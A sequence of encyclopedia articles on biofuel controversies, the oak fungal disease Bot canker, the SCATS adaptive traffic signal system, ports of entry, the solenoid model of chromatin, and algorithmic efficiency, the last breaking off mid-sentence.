or biomethanol. Diesel engines can run on the latter fuels, as well as on vegetable oils (which are cheaper). However, the latter is only possible when the engine has been foreseen with indirect injection. If no indirect injection is present, the engine hence needs to be fitted with this. Campaigns A number of environmental NGOs campaign against the production of biofuels as a large-scale alternative to fossil fuels. For example, Friends of the Earth state that "the current rush to develop agrofuels (or biofuels) on a large scale is ill-conceived and will contribute to an already unsustainable trade whilst not solving the problems of climate change or energy security". Some mainstream environmental groups support biofuels as a significant step toward slowing or stopping global climate change. However, supportive environmental groups generally hold the view that biofuel production can threaten the environment if it is not done sustainably. This finding has been backed by reports of the UN, the IPCC, and some other smaller environmental and social groups as the EEB and the Bank Sarasin, which generally remain negative about biofuels. As a result, governmental and environmental organizations are turning against biofuels made in a non-sustainable way (hereby preferring certain oil sources as jatropha and lignocellulose over palm oil) and are asking for global support for this. Also, besides supporting these more sustainable biofuels, environmental organizations are redirecting to new technologies that do not use internal combustion engines such as hydrogen and compressed air. Several standard-setting and certification initiatives have been set up on the topic of biofuels. The "Roundtable on Sustainable Biofuels" is an international initiative which brings together farmers, companies, governments, non-governmental organizations, and scientists who are interested in the sustainability of biofuels production and distribution. During 2008, the Roundtable is developing a series of principles and criteria for sustainable biofuels production through meetings, teleconferences, and online discussions. In a similar vein, the Bonsucro standard has been developed as a metric-based certificate for products and supply chains, as a result of an ongoing multi-stakeholder initiative focussing on the products of sugar cane, including ethanol fuel. The increased manufacture of biofuels will require increasing land areas to be used for agriculture. Second and third generation biofuel processes can ease the pressure on land, because they can use waste biomass, and existing (untapped) sources of biomass such as crop residues and potentially even marine algae. In some regions of the world, a combination of increasing demand for food, and increasing demand for biofuel, is causing deforestation and threats to biodiversity. The best reported example of this is the expansion of oil palm plantations in Malaysia and Indonesia, where rainforest is being destroyed to establish new oil palm plantations. It is an important fact that 90% of the palm oil produced in Malaysia is used by the food industry; therefore biofuels cannot be held solely responsible for this deforestation. There is a pressing need for sustainable palm oil production for the food and fuel industries; palm oil is used in a wide variety of food products. The Roundtable on Sustainable Biofuels is working to define criteria, standards and processes to promote sustainably produced biofuels. Palm oil is also used in the manufacture of detergents, and in electricity and heat generation both in Asia and around the world (the UK burns palm oil in coal-fired power stations to generate electricity). Significant area is likely to be dedicated to sugar cane in future years as demand for ethanol increases worldwide. The expansion of sugar cane plantations will place pressure on environmentally sensitive native ecosystems including rainforest in South America. In forest ecosystems, these effects themselves will undermine the climate benefits of alternative fuels, in addition to representing a major threat to global biodiversity. Although biofuels are generally considered to improve net carbon output, biodiesel and other fuels do produce local air pollution, including nitrogen oxides, the principal cause of smog. See also Agflation Environmental impact of aviation Social and environmental impact of palm oil Environmental issues with energy Indirect land use change impacts of biofuels List of environmental issues References External links Roundtable on Sustainable Biofuels - The Roundtable on Sustainable Biofuels Announces Version Zero of our Sustainability Standard World Bank, Biofuels: The Promise and the Risks. World Development Report 2008: Agriculture for Development Biofuels Aren't Really Green - by Deepak Divan, Frank Kreikebaum, Institute of Electrical and Electronics Engineers, Spectrum, November 2009 Global Trade and Environmental Impact Study of the EU Biofuels Mandate by the International Food Policy Institute (IFPRI) March 2010 Biofuels technology Biofuels
Issues relating to biofuels
Biology
4,476
32,958,853
https://en.wikipedia.org/wiki/Botryosphaeria%20corticola
Bot canker of oak is a disease on stems, branches and twigs of oak trees in Europe and North America. The casual agent of Bot canker of oak is the fungus Botryosphaeria corticola. Bot canker of oak causes lesions and cankers on a wide range of oaks in Europe and most recently live oaks in North America. Some infections were formerly attributed to Botryosphaeria stevensii, but most likely represent infections by Botryosphaeria corticola. Botryosphaeria corticola is distinguishable from Botryosphaeria stevensii via ITS rDNA sequencing. Overview Botryosphaeria corticola has caused infection of oak trees in Spain, Portugal, Morocco, Italy, Greece, Hungary, and the United States. Bot canker of oak kills trees in natural forests as well as in cork plantations. The cork industry in Portugal, Spain, France, Italy, and Morocco has been dealing with declining oaks for several years from biotic and abiotic factors. This disease has been seen in many cork plantations and is the most important contributor to the decline in the cork industry. When cork is harvested from the trees, the cork cambium is exposed creating a wound for the fungus to enter the trunk, and cause disease. Infection of other oaks is most likely through wounds as well. These wounds may be natural wounds, but there is evidence insect damage is involved, especially in coast live oak in California. Botryosphaeria corticola infects the twigs, branches and stems of oaks and degrades the cambial tissues. With the degradation of vascular tissues, the trees display wilting and dieback symptoms. Hosts Europe/North Africa Cork oak (Quercus suber) Holm oak (Quercus ilex) Kermes oak (Quercus coccifera) Sessile oak (Quercus petraea) North America White Oak (Quercus alba) Canyon live oak (Quercus chrysolepis) Coast live oak (Quercus agrifolia) Laurel oak (Quercus laurifolia) Live oak (Quercus virginiana) Grape (Vitis sp. ) Management Botryosphaeria corticola can be managed in high value trees, but there is no current management for forest trees. Carbendazim and thiophanate-methyl have shown to prevent infection in cork oak in Europe, where it is applied after cork has been harvested. Sanitation is the most common management technique for this disease. Branches with diseased tissue are pruned off, and heavily infected trees are removed. This prevents future infections by limiting the amount of spores in the area. Description Botryosphaeria corticola (Diplodia corticola) is a ascomycete fungus. It has both asexual (Diplodia corticola) and sexual reproduction (Botryosphaeria corticola) stages occurring naturally. The asexual spores (conidia) occur in pycnidia from conidiogenous cells, without conidiophores. Pycnidia are dark brown to black, circular, immersed, partially erumpent and up to 1 mm diameter. The sexual spores are eight biseriate ascospores occur inside of asci occur in immersed, partially erumpent, dark brown to black pseudothecia, up to 1 mm in diameter. References Fungal tree pathogens and diseases corticola Fungi described in 2004 Fungus species
Botryosphaeria corticola
Biology
711
5,720,835
https://en.wikipedia.org/wiki/Sydney%20Coordinated%20Adaptive%20Traffic%20System
The Sydney Coordinated Adaptive Traffic System, abbreviated SCATS, is an intelligent transportation system that manages the dynamic (on-line, real-time) timing of signal phases at traffic signals, meaning that it tries to find the best phasing (i.e. cycle times, phase splits and offsets) for a traffic situation (for individual intersections as well as for the whole network). SCATS is based on the automatic plan selection from a library in response to the data derived from loop detectors or other road traffic sensors. SCATS uses sensors at each traffic signal to detect vehicle presence in each lane and pedestrians waiting to cross at the local site. The vehicle sensors are generally inductive loops installed within the road pavement. These are unable to detect bicycles. The pedestrian sensors are usually push buttons. Various other types of sensors can be used for vehicle presence detection, provided that a similar and consistent output is achieved. Information collected from the vehicle sensors allows SCATS to calculate and adapt the timing of traffic signals in the network. SCATS is installed at about 55,000 intersections in over 180 cities in 28 countries. In Australia, where the system was first developed, the majority of signalised intersections are SCATS operated (around 11,000). The SCATS system is owned by the Australian state of New South Wales, whose state capital is Sydney. In December 2019, Transport for NSW, the transport and road agency in New South Wales, began to look into commercialising the SCATS system. Features Default operation The architecture of SCATS is at two basic levels, LOCAL and MASTER. The LOCAL is the control cabinet at the roadside, which provides the normal signal control as well as processing of traffic information deduced from the vehicle detectors. The MASTER is a remote computer which provides area based traffic control, i.e. area traffic control (ATC) or urban traffic control (UTC). Detailed traffic signal and hardware diagnostics are passed from the LOCAL to the MASTER, with the ability to notify staff when a traffic signal has a fault. SCATS is able to operate over PAPL, ADSL, PSTN and 3G IP network connections to each intersection. SCATS can also operate on a network of private cables not requiring third party telecommunications support and large parts of inner Sydney have always operated this way. Priority levels Public vehicle priority in SCATS (using data provided from PTIPS) caters for both buses and trams. SCATS has a facility to provide three levels of priority: High – In the high priority mode the "hurry call" facility is used. (i.e. the phase needed by a bus, tram or emergency vehicle is called immediately, skipping other phases if necessary) Medium (Flexible window) – Phases can be shortened to allow the bus/tram phase to be brought in early. The bus/tram phase can occur at more than one place in the cycle. Low – takes its turn. Trams would normally be given high priority, the aim of which is to get the tram through without it stopping. Buses would normally expect to receive a medium level of priority. Instant fault detection and quick repair The ATC system is equipped with the function of fault detection and logging the fault detected in order to facilitate repair and maintenance. Should there be a telecommunication breakdown, the ATC junction controller concerned will switch to standalone mode and continue to function. Traffic Adaptive Operation ATC systems provide advanced method of traffic signal control called Traffic Adaptive Control where the operational timing plans including cycle length, splits and offsets are continuously reviewed and modified in small increment, almost on a cycle-by-cycle basis, to match with the prevailing demand measured by the detectors connected to the on-street traffic controllers. SCATS Ramp Metering System The SCATS Ramp Metering System (SRMS) is a SCATS subsystem and controls traffic signals at the entries of motorways and integrates with SCATS intersection control for promoting integrated real-time management of the traffic corridor as a whole. The objective of SRMS, based on current traffic conditions, is to efficiently determine: When ramp metering signals start and end ramp metering operation The metering flow rates of the operating ramp metering signals Which actions shall be taken to signalised intersections of the corridor to promote network-wide benefits. SRMS achieves these objectives by implementing a collection of pre-configured adaptive intelligent strategies either automatically or manually. In manual mode, the SRMS operator can create new or manipulate existing rules in order to adjust the ramp metering system for effective operation during any planned or unplanned events (e.g. incidents). SRMS is a distributed control system that operates on a central control server and road-side traffic controllers. The central control server is a component of SCATS and inherently provide integrated motorway and arterial real-time management. The road-side controllers are installed on motorway on-ramps and are used to: Set the traffic signal times Set the state of on-ramp changeable signs Manage the sequences start and end ramp metering operation; and Measure traffic states using vehicle detectors. Metering rates are determined by the local traffic signal controller or by the central control server. Metering rates can be determined in two ways: adaptive operation, or time-of-day-based operation typically when a communications failure or critical vehicle detector failures take place The adaptive operation optimises mainline traffic state by using real-time data from vehicle detector stations installed at several mainline locations, ramps and optionally at arterial roads. The adaptive operation determines control actions at 10 seconds intervals and applies some or all of the following strategies simultaneously: Coordinated ramp metering Ramp queue management Automatic begin and end of ramp metering operation Variation routines for integration with SCATS intersection control Variation routines for automated incident responses and unusual circumstances Manual controls for incident responses and unusual circumstances Critical lane occupancy calibration Fault-tolerant strategies Data logging for performance reporting and off-line analysis SRMS is currently used as the Auckland ramp metering system. Simulation SCATS can be simulated in-the-loop (SCATSIM) using third party traffic simulation tools. SCATSIM offers an interface supported by Aimsun, PTV VISSIM, Quadstone Paramics and Commuter. SCATSIM offers kerb-side hardware and firmware emulation that interfaces seamless to the SCATS Region and Central Manager offering the same control strategies used in field deployments for both intersections and ramp metering (SRMS). The configuration files prepared by authorities for the Central Manager, Region, SRMS and kerb-side controllers can be re-used without modification by SCATSIM. When Commuter software was acquired by Autodesk, Azalient Ltd support for the Commuter interface was deprecated. Azalient Ltd also developed a plugin that enabled the Quadstone Paramics interface to SCATSIM. This plugin is also deprecated. History SCATS was developed in Sydney, Australia by the New South Wales Department of Main Roads (a predecessor of Transport for NSW) in the 1970s. It began to be used in Melbourne in 1982, Adelaide, South Australia in 1982 and Western Australia in 1983. It is also used in New Zealand, Hong Kong, Shanghai, Guangzhou, Amman, Tehran, Dublin, Rzeszów, Gdynia, Central New Jersey, in part of Metro Atlanta, and Cebu City, among several other places. In Hong Kong, SCATS is currently adopted in the area traffic control systems at Hong Kong Island, Kowloon, Tsuen Wan and Shatin. The system may be referred to by an alternative name in a specific installation. However, since deployment outside Australia, New Zealand and Singapore, localised names do not appear to be commonly used. The following are some local alternative names that have been or are in use: Canberra "CATSS" (Canberra Automated Traffic Signal System) Melbourne "SCRAM" (Signal Co-ordination for Regional Areas of Melbourne) Adelaide "ACTS" (Adelaide Co-ordinated Traffic Signals) Perth "PCATS" Singapore "GLIDE" Northern Territory "DARTS" SCATS is a recognised worldwide market leader in intelligent transport systems. Transport for NSW is continuing to develop SCATS to meet emerging technological, user and traffic demands. See also PTIPS - works together with SCATS to provide transport vehicles with priority at traffic signals Other Intelligent Transportation Systems include: STREAMS BLISS Inductive loop vehicle detection References External links Roads ACT Roads and Maritime Services, NSW SCATS - Sydney Coordinated Adaptive Traffic System Website SCATS - Main Roads Western Australia Traffic Lights in NSW - Roads and Maritime Services Website RTA and SCATS at the 17th ITS World Congress in Korea Review of Bus Priority at Traffic Signals around the World Intelligent transportation systems Traffic signals
Sydney Coordinated Adaptive Traffic System
Technology
1,767
412,384
https://en.wikipedia.org/wiki/Port%20of%20entry
In general, a port of entry (POE) is a place where one may lawfully enter a country. It typically has border security staff and facilities to check passports and visas and to inspect luggage to assure that contraband is not imported. International airports are usually ports of entry, as are road and rail crossings on a land border. Seaports can be used as ports of entry only if a dedicated customs presence is posted there. The choice of whether to become a port of entry is up to the civil authority controlling the port. Airport of entry An airport of entry (AOE) is an airport that provides customs and immigration services for incoming flights. These services allow the airport to serve as an initial port of entry for foreign visitors arriving in a country. Terminology The word "international" in an airport's name usually means that it is an airport of entry, but many airports of entry do not use it. Airports of entry can range from large urban airports with heavy scheduled passenger service, like John F. Kennedy International Airport, to small rural airports serving general aviation exclusively. Often, smaller airports of entry are located near an existing port of entry such as a bridge or seaport. On the other hand, however, some "former" airports of entry chose to leave their name with the word "international" in it, even though they no longer serve international flights. One example is Osaka International Airport. Even when it had ended all international services and became a purely domestic airport after the opening of Kansai International Airport in 1994, it kept its original name of "Osaka International Airport". Many airports in the nearby region have the same situation, like Taipei Songshan Airport. Songshan retained its official Chinese name, Taipei International Airport, after Chiang Kai-shek International Airport (now Taiwan Taoyuan International Airport) opened. Similar cases of transitions of international airports such as Seoul, Tokyo, Nagoya, Shanghai, Hong Kong, Bangkok, Tehran, etc. For the European Union, flights between countries in the Schengen Area are considered domestic regarding passport and immigration check. Several international airports have only intra-Schengen flights. Several of these have occasional charter flights to foreign countries. Stateless persons Some cases of statelessness have occurred in airports of entry forcing people to live in the airport for an extended period. One of the most famous cases was that of Mehran Karimi Nasseri, an Iranian national who lived in the Charles de Gaulle Airport in France for approximately eighteen years after being denied entry into France and not having a country of origin to be returned to due to claiming his Iranian nationality had been revoked. Nasseri's experience was loosely adapted by two films, the 1993 film Tombés du ciel and the 2004 film The Terminal. Zahra Kamalfar, an Iranian national who attempted to travel to Canada via Russia and Germany using forged documents, lived in the Sheremetyevo International Airport in Russia for eleven months before being granted refugee status by Canada to reunite with her family in Vancouver. In the United States The formal definition of a port of entry in the United States is something entirely different. According to the Code of Federal Regulations, "the terms 'port' and 'port of entry' incorporate the geographical area under the jurisdiction of a port director." In other words, a port of entry may encompass an area that includes several border crossings, as well as some air and sea ports. This also means that not every border crossing is a port of entry. There are two reasons for this: Every port of entry must have a Port Director, which is a higher pay grade than a typical border inspector. The U.S. government has determined that some small border crossings do not need their own Port Directors. As a result, border outposts like Churubusco, Chateaugay and Fort Covington, New York are considered "stations" within the Trout River Port of Entry. Historically, many roads entering the U.S. had no border inspection station. Before September 11, 2001, it was permissible for persons entering the U.S. to do so at any point (including back roads or closed border stations), as long as they proceeded directly to an open border inspection station. In fact, the U.S. Customs Service and U.S. Immigration and Naturalization Service routinely rented property in houses, post offices, and storefronts far from the physical border, and people entering the U.S. were expected to travel to these locations without stopping so they could make their declarations. This policy has since changed, and most of the roads entering the U.S. at locations other than an open and staffed border inspection station have since been barricaded. Variations In some countries, immigration procedures are carried out by the armed forces rather than specific immigration officers. However, in most, the levying of duty on imports is still carried out by customs officers. Immigration clearance in some ports of entry have automated sections open to the country's own residents or citizens, such as the e-Channel found in Hong Kong and Macau, Global Entry found at some airports in the United States and other similar country-instituted programs. On some international borders, the concept of a port of entry does not exist or is at least not applied to select countries of free-crossing pacts. Travelers may cross the border wherever and whenever convenient. For example, and as such a pact, most EU citizens may travel freely within the Schengen Area, which is made up of 29 European countries. As with the example, in some cases, such free travel may be restricted to citizens of specific countries and to travelers who are not carrying goods over the customs limits; others may only cross the border at a designated border crossing during its opening times. See also Border Border checkpoint Border control Customs Schengen Agreement References Freight transport Borders
Port of entry
Physics
1,177
10,144,966
https://en.wikipedia.org/wiki/Solenoid%20%28DNA%29
The solenoid structure of chromatin is a model for the structure of the 30 nm fibre. It is a secondary chromatin structure which helps to package eukaryotic DNA into the nucleus. Background Chromatin was first discovered by Walther Flemming by using aniline dyes to stain it. In 1974, it was first proposed by Roger Kornberg that chromatin was based on a repeating unit of a histone octamer and around 200 base pairs of DNA. The solenoid model was first proposed by John Finch and Aaron Klug in 1976. They used electron microscopy images and X-ray diffraction patterns to determine their model of the structure. This was the first model to be proposed for the structure of the 30 nm fibre. Structure DNA in the nucleus is wrapped around nucleosomes, which are histone octamers formed of core histone proteins; two histone H2A-H2B dimers, two histone H3 proteins, and two histone H4 proteins. The primary chromatin structure, the least-packed form, is the 11 nm, or “beads on a string” form, where DNA is wrapped around nucleosomes at relatively regular intervals, as Roger Kornberg proposed. Histone H1 protein binds to the site where DNA enters and exits the nucleosome, wrapping 147 base pairs around the histone core and stabilising the nucleosome, this structure is a chromatosome. In the solenoid structure, the nucleosomes fold up and are stacked, forming a helix. They are connected by bent linker DNA which positions sequential nucleosomes adjacent to one another in the helix. The nucleosomes are positioned with the histone H1 proteins facing toward the centre where they form a polymer. Finch and Klug determined that the helical structure had only one-start point because they mostly observed small pitch angles of 11 nm, which is about the same diameter as a nucleosome. There are approximately 6 nucleosomes in each turn of the helix. Finch and Klug actually observed a wide range of nucleosomes per turn but they put this down to flattening. Finch and Klug's electron microscopy images had a lack of visible detail so they were unable to determine helical parameters other than the pitch. More recent electron microscopy images have been able to define the dimensions of solenoid structures and identified it as a left-handed helix. The structure of solenoids are insensitive to changes in the length of the linker DNA. Function The solenoid structure's most obvious function is to help package the DNA so that it is small enough to fit into the nucleus. This is a big task as the nucleus of a mammalian cell has a diameter of approximately 6 μm, whilst the DNA in one human cell would stretch to just over 2 metres long if it were unwound. The "beads on a string" structure can compact DNA to 7 times smaller. The solenoid structure can increase this to be 40 times smaller. When DNA is compacted into the solenoid structure can still be transcriptionally active in certain areas. It is the secondary chromatin structure that is important for this transcriptional repression as in vivo active genes are assembled in large tertiary chromatin structures. Formation There are many factors that affect whether the solenoid structure will form or not. Some factors alter the structure of the 30 nm fibre, and some prevent it from forming in that region altogether. The concentration of ions, particularly divalent cations affects the structure of the 30 nm fibre, which is why Finch and Klug were not able to form solenoid structures in the presence of chelating agents. There is an acidic patch on the surface of histone H2A and histone H2B proteins which interacts with the tails of histone H4 proteins in adjacent nucleosomes. These interactions are important for solenoid formation. Histone variants can affect solenoid formation, for example H2A.Z is a histone variant of H2A, and it has a more acidic patch than the one on H2A, so H2A.Z would have a stronger interaction with histone H4 tails and probably contribute to solenoid formation. The histone H4 tail is essential for formation of 30 nm fibres. However, acetylation of core histone tails affects the folding of chromatin by destabilising interactions between the DNA and the nucleosomes, making histone modulation a key factor in solenoid structure. Acetylation of H4K16 (the lysine which is the 16th amino acid from the N-terminal of histone H4) inhibits 30 nm fibre formation. To decompact the 30 nm fibre, for instance to transcriptionally activate it, both H4K16 acetylation and removal of the histone H1 proteins are required. Further packaging Chromatin can form a tertiary chromatin structure and be compacted even further than the solenoid structure by forming supercoils which have a diameter of around 700 nm. This supercoil is formed by regions of DNA called scaffold/matrix attachment regions (SMARs) attaching to a central scaffolding matrix in the nucleus creating loops of solenoid chromatin between 4.5 and 112 kilobase pairs long. The central scaffolding matrix itself forms a spiral shape for an additional layer of compaction. Alternative models Several other models have been proposed and there is still a lot of uncertainty about the structure of the 30 nm fibre. Even the more recent research produces conflicting information. There is data from electron microscopy measurements of the 30 nm fibre dimensions that has physical constraints which mean it can only be modelled with a one-start helical structure like the solenoid structure. It also shows there is no linear relationship between the length of the linker DNA and the dimensions (instead there are two distinct classes). There is also data from experiments which cross-linked nucleosomes that shows a two-start structure. There is evidence that suggests both the solenoid and zig-zag (two-start) structures are present in 30 nm fibres. It is possible that chromatin structure may not be as ordered as previously thought, or that the 30 nm fibre may not even be present in situ. Two-start twisted-ribbon model The two-start twisted-ribbon model was proposed in 1981 by Worcel, Strogatz and Riley. This structure involves alternating nucleosomes stacking to form two parallel helices, with the linker DNA zig-zagging up and down the helical axis. Two-start cross-linker model The two-start cross-linker model was proposed in 1986 by Williams et al. This structure, like the two-start twisted-ribbon model, involves alternating nucleosomes stacking to form two parallel helices, but the nucleosomes are on opposite sides of the helices with the linker DNA crossing across the centre of the helical axis. Superbead model The superbead model was proposed by Renz in 1977. This structure is not helical like the other models, it instead consists of discrete globular structures along the chromatin which vary in size. Some alternative forms of DNA packaging The chromatin in mammalian sperm is the most condensed form of eukaryotic DNA, it is packaged by protamines rather than nucleosomes, whilst prokaryotes package their DNA through supercoiling. References External links Aaron Klug tells his life story at the Web of Stories: The Solenoid Model Molecular genetics DNA
Solenoid (DNA)
Chemistry,Biology
1,609
145,128
https://en.wikipedia.org/wiki/Algorithmic%20efficiency
In computer science, algorithmic efficiency is a property of an algorithm which relates to the amount of computational resources used by the algorithm. Algorithmic efficiency can be thought of as analogous to engineering productivity for a repeating or continuous process. For maximum efficiency it is desirable to minimize resource usage. However, different resources such as time and space complexity cannot be compared directly, so which of two algorithms is considered to be more efficient often depends on which measure of efficiency is considered most important. For example, bubble sort and timsort are both algorithms to sort a list of items from smallest to largest. Bubble sort organizes the list in time proportional to the number of elements squared (, see Big O notation), but only requires a small amount of extra memory which is constant with respect to the length of the list (). Timsort sorts the list in time linearithmic (proportional to a quantity times its logarithm) in the list's length (), but has a space requirement linear in the length of the list (). If large lists must be sorted at high speed for a given application, timsort is a better choice; however, if minimizing the memory footprint of the sorting is more important, bubble sort is a better choice. Background The importance of efficiency with respect to time was emphasized by Ada Lovelace in 1843 as applied to Charles Babbage's mechanical analytical engine: "In almost every computation a great variety of arrangements for the succession of the processes is possible, and various considerations must influence the selections amongst them for the purposes of a calculating engine. One essential object is to choose that arrangement which shall tend to reduce to a minimum the time necessary for completing the calculation" Early electronic computers had both limited speed and limited random access memory. Therefore, a space–time trade-off occurred. A task could use a fast algorithm using a lot of memory, or it could use a slow algorithm using little memory. The engineering trade-off was therefore to use the fastest algorithm that could fit in the available memory. Modern computers are significantly faster than early computers and have a much larger amount of memory available (gigabytes instead of kilobytes). Nevertheless, Donald Knuth emphasized that efficiency is still an important consideration: "In established engineering disciplines a 12% improvement, easily obtained, is never considered marginal and I believe the same viewpoint should prevail in software engineering" Overview An algorithm is considered efficient if its resource consumption, also known as computational cost, is at or below some acceptable level. Roughly speaking, 'acceptable' means: it will run in a reasonable amount of time or space on an available computer, typically as a function of the size of the input. Since the 1950s computers have seen dramatic increases in both the available computational power and in the available amount of memory, so current acceptable levels would have been unacceptable even 10 years ago. In fact, thanks to the approximate doubling of computer power every 2 years, tasks that are acceptably efficient on modern smartphones and embedded systems may have been unacceptably inefficient for industrial servers 10 years ago. Computer manufacturers frequently bring out new models, often with higher performance. Software costs can be quite high, so in some cases the simplest and cheapest way of getting higher performance might be to just buy a faster computer, provided it is compatible with an existing computer. There are many ways in which the resources used by an algorithm can be measured: the two most common measures are speed and memory usage; other measures could include transmission speed, temporary disk usage, long-term disk usage, power consumption, total cost of ownership, response time to external stimuli, etc. Many of these measures depend on the size of the input to the algorithm, i.e. the amount of data to be processed. They might also depend on the way in which the data is arranged; for example, some sorting algorithms perform poorly on data which is already sorted, or which is sorted in reverse order. In practice, there are other factors which can affect the efficiency of an algorithm, such as requirements for accuracy and/or reliability. As detailed below, the way in which an algorithm is implemented can also have a significant effect on actual efficiency, though many aspects of this relate to optimization issues. Theoretical analysis In the theoretical analysis of algorithms, the normal practice is to estimate their complexity in the asymptotic sense. The most commonly used notation to describe resource consumption or "complexity" is Donald Knuth's Big O notation, representing the complexity of an algorithm as a function of the size of the input . Big O notation is an asymptotic measure of function complexity, where roughly means the time requirement for an algorithm is proportional to , omitting lower-order terms that contribute less than to the growth of the function as grows arbitrarily large. This estimate may be misleading when is small, but is generally sufficiently accurate when is large as the notation is asymptotic. For example, bubble sort may be faster than merge sort when only a few items are to be sorted; however either implementation is likely to meet performance requirements for a small list. Typically, programmers are interested in algorithms that scale efficiently to large input sizes, and merge sort is preferred over bubble sort for lists of length encountered in most data-intensive programs. Some examples of Big O notation applied to algorithms' asymptotic time complexity include: Measuring performance For new versions of software or to provide comparisons with competitive systems, benchmarks are sometimes used, which assist with gauging an algorithms relative performance. If a new sort algorithm is produced, for example, it can be compared with its predecessors to ensure that at least it is efficient as before with known data, taking into consideration any functional improvements. Benchmarks can be used by customers when comparing various products from alternative suppliers to estimate which product will best suit their specific requirements in terms of functionality and performance. For example, in the mainframe world certain proprietary sort products from independent software companies such as Syncsort compete with products from the major suppliers such as IBM for speed. Some benchmarks provide opportunities for producing an analysis comparing the relative speed of various compiled and interpreted languages for example and The Computer Language Benchmarks Game compares the performance of implementations of typical programming problems in several programming languages. Even creating "do it yourself" benchmarks can demonstrate the relative performance of different programming languages, using a variety of user specified criteria. This is quite simple, as a "Nine language performance roundup" by Christopher W. Cowell-Shah demonstrates by example. Implementation concerns Implementation issues can also have an effect on efficiency, such as the choice of programming language, or the way in which the algorithm is actually coded, or the choice of a compiler for a particular language, or the compilation options used, or even the operating system being used. In many cases a language implemented by an interpreter may be much slower than a language implemented by a compiler. See the articles on just-in-time compilation and interpreted languages. There are other factors which may affect time or space issues, but which may be outside of a programmer's control; these include data alignment, data granularity, cache locality, cache coherency, garbage collection, instruction-level parallelism, multi-threading (at either a hardware or software level), simultaneous multitasking, and subroutine calls. Some processors have capabilities for vector processing, which allow a single instruction to operate on multiple operands; it may or may not be easy for a programmer or compiler to use these capabilities. Algorithms designed for sequential processing may need to be completely redesigned to make use of parallel processing, or they could be easily reconfigured. As parallel and distributed computing grow in importance in the late 2010s, more investments are being made into efficient high-level APIs for parallel and distributed computing systems such as CUDA, TensorFlow, Hadoop, OpenMP and MPI. Another problem which can arise in programming is that processors compatible with the same instruction set (such as x86-64 or ARM) may implement an instruction in different ways, so that instructions which are relatively fast on some models may be relatively slow on other models. This often presents challenges to optimizing compilers, which must have extensive knowledge of the specific CPU and other hardware available on the compilation target to best optimize a program for performance. In the extreme case, a compiler may be forced to emulate instructions not supported on a compilation target platform, forcing it to generate code or link an external library call to produce a result that is otherwise incomputable on that platform, even if it is natively supported and more efficient in hardware on other platforms. This is often the case in embedded systems with respect to floating-point arithmetic, where small and low-power microcontrollers often lack hardware support for floating-point arithmetic and thus require computationally expensive software routines to produce floating point calculations. Measures of resource usage Measures are normally expressed as a function of the size of the input . The two most common measures are: Time: how long does the algorithm take to complete? Space: how much working memory (typically RAM) is needed by the algorithm? This has two aspects: the amount of memory needed by the code (auxiliary space usage), and the amount of memory needed for the data on which the code operates (intrinsic space usage). For computers whose power is supplied by a battery (e.g. laptops and smartphones), or for very long/large calculations (e.g. supercomputers), other measures of interest are: Direct power consumption: power needed directly to operate the computer. Indirect power consumption: power needed for cooling, lighting, etc. , power consumption is growing as an important metric for computational tasks of all types and at all scales ranging from embedded Internet of things devices to system-on-chip devices to server farms. This trend is often referred to as green computing. Less common measures of computational efficiency may also be relevant in some cases: Transmission size: bandwidth could be a limiting factor. Data compression can be used to reduce the amount of data to be transmitted. Displaying a picture or image (e.g. Google logo) can result in transmitting tens of thousands of bytes (48K in this case) compared with transmitting six bytes for the text "Google". This is important for I/O bound computing tasks. External space: space needed on a disk or other external memory device; this could be for temporary storage while the algorithm is being carried out, or it could be long-term storage needed to be carried forward for future reference. Response time (latency): this is particularly relevant in a real-time application when the computer system must respond quickly to some external event. Total cost of ownership: particularly if a computer is dedicated to one particular algorithm. Time Theory Analysis of algorithms, typically using concepts like time complexity, can be used to get an estimate of the running time as a function of the size of the input data. The result is normally expressed using Big O notation. This is useful for comparing algorithms, especially when a large amount of data is to be processed. More detailed estimates are needed to compare algorithm performance when the amount of data is small, although this is likely to be of less importance. Parallel algorithms may be more difficult to analyze. Practice A benchmark can be used to assess the performance of an algorithm in practice. Many programming languages have an available function which provides CPU time usage. For long-running algorithms the elapsed time could also be of interest. Results should generally be averaged over several tests. Run-based profiling can be very sensitive to hardware configuration and the possibility of other programs or tasks running at the same time in a multi-processing and multi-programming environment. This sort of test also depends heavily on the selection of a particular programming language, compiler, and compiler options, so algorithms being compared must all be implemented under the same conditions. Space This section is concerned with use of memory resources (registers, cache, RAM, virtual memory, secondary memory) while the algorithm is being executed. As for time analysis above, analyze the algorithm, typically using space complexity analysis to get an estimate of the run-time memory needed as a function as the size of the input data. The result is normally expressed using Big O notation. There are up to four aspects of memory usage to consider: The amount of memory needed to hold the code for the algorithm. The amount of memory needed for the input data. The amount of memory needed for any output data. Some algorithms, such as sorting, often rearrange the input data and do not need any additional space for output data. This property is referred to as "in-place" operation. The amount of memory needed as working space during the calculation. This includes local variables and any stack space needed by routines called during a calculation; this stack space can be significant for algorithms which use recursive techniques. Early electronic computers, and early home computers, had relatively small amounts of working memory. For example, the 1949 Electronic Delay Storage Automatic Calculator (EDSAC) had a maximum working memory of 1024 17-bit words, while the 1980 Sinclair ZX80 came initially with 1024 8-bit bytes of working memory. In the late 2010s, it is typical for personal computers to have between 4 and 32 GB of RAM, an increase of over 300 million times as much memory. Caching and memory hierarchy Modern computers can have relatively large amounts of memory (possibly gigabytes), so having to squeeze an algorithm into a confined amount of memory is not the kind of problem it used to be. However, the different types of memory and their relative access speeds can be significant: Processor registers, are the fastest memory with the least amount of space. Most direct computation on modern computers occurs with source and destination operands in registers before being updated to the cache, main memory and virtual memory if needed. On a processor core, there are typically on the order of hundreds of bytes or fewer of register availability, although a register file may contain more physical registers than architectural registers defined in the instruction set architecture. Cache memory is the second fastest, and second smallest, available in the memory hierarchy. Caches are present in processors such as CPUs or GPUs, where they are typically implemented in static RAM, though they can also be found in peripherals such as disk drives. Processor caches often have their own multi-level hierarchy; lower levels are larger, slower and typically shared between processor cores in multi-core processors. In order to process operands in cache memory, a processing unit must fetch the data from the cache, perform the operation in registers and write the data back to the cache. This operates at speeds comparable (about 2-10 times slower) with the CPU or GPU's arithmetic logic unit or floating-point unit if in the L1 cache. It is about 10 times slower if there is an L1 cache miss and it must be retrieved from and written to the L2 cache, and a further 10 times slower if there is an L2 cache miss and it must be retrieved from an L3 cache, if present. Main physical memory is most often implemented in dynamic RAM (DRAM). The main memory is much larger (typically gigabytes compared to ≈8 megabytes) than an L3 CPU cache, with read and write latencies typically 10-100 times slower. , RAM is increasingly implemented on-chip of processors, as CPU or GPU memory. Paged memory, often used for virtual memory management, is memory stored in secondary storage such as a hard disk, and is an extension to the memory hierarchy which allows use of a potentially larger storage space, at the cost of much higher latency, typically around 1000 times slower than 